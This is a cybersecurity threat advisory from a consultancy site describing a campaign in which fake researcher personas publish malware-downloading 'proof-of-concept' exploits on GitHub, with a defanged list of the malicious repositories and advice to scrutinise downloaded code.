Fake Zero-Day PoC Exploits on GitHub Push Windows, Linux malware

Cyber Security Threat Summary:
"Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware. These malicious exploits are promoted by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' who promote the GitHub repositories on Twitter, likely to target cybersecurity researchers and firms involved in vulnerability research. The repositories appear legitimate, and the users who maintain them impersonate real security researchers from Rapid7, and other security firms, even using their headshots. The same personas maintain accounts on Twitter to help add legitimacy to their research and the code repositories like GitHub, as well as draw victims from the social media platform" (Bleeping Computer, 2023).

According to cyber threat intelligence platform VulnCheck, the latest activity has been ongoing since May 2023, with the actors promoting fake exploits for zero-days in software such as Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. The threat actors are distributing the exploits as a Python script ('poc.py') on GitHub repositories, which acts as a malware downloader for Linux and Windows systems.

"The script downloads a ZIP archive from an external URL to the victim's computer depending on their operating system, with Linux users downloading 'cveslinux.zip' and Windows users receiving 'cveswindows.zip.' The malware is saved to the Windows %Temp% or the Linux /home//.local/share folders, extracted, and executed. VulnCheck reports that the Windows binary contained in the ZIP ('cves_windows.exe') is flagged by over 60% of AV engines on VirusTotal. The Linux binary ('cves_linux') is much more stealthy, only caught by three scanners" (Bleeping Computer, 2023).

Security Officer Comments:
It is unclear if the latest campaign has been successful in infecting potential victims nor is it certain what payloads are being deployed. Researchers say both the Windows and Linux executables install a TOR client. Furthermore, based on VirusTotal entries, the Windows version seems to be a password-stealing trojan.

VulnCheck included a list of malicious GitHub repositories hosting fake exploits, which were still available at the time of timing:

  • github[.]com/AKuzmanHSCS/Microsoft-Exchange-RCE
  • github[.]com/MHadzicHSCS/Chrome-0-day
  • github[.]com/GSandersonHSCS/discord-0-day-fix
  • github[.]com/BAdithyaHSCS/Exchange-0-Day
  • github[.]com/RShahHSCS/Discord-0-Day-Exploit
  • github[.]com/DLandonHSCS/Discord-RCE
  • github[.]com/SsankkarHSCS/Chromium-0-Day


    Although these repositories will likely be taken down, this won't stop the threat actors from creating new ones. As such, researchers and cybersecurity professionals should take caution when downloading scripts from unknown repositories, seeing how this may pave the opportunity for hackers to infect unsuspecting users with malware.

    Suggested Correction(s):
    "When downloading code from GitHub, it is imperative that all code be scrutinized for malicious behavior. In this case, the downloading and execution of malware is easily visible in the PoCs, but that may not be the case in all situations where threat actors may obfuscate malicious code" (Bleeping Computer, 2023).

    Link(s):
    https://www.bleepingcomputer.com/

    Contact Us for Threat Assistance Back to Current Threats

    • Just Starting?



    Contact LACyber for More Info



    Current Active Cyber Threats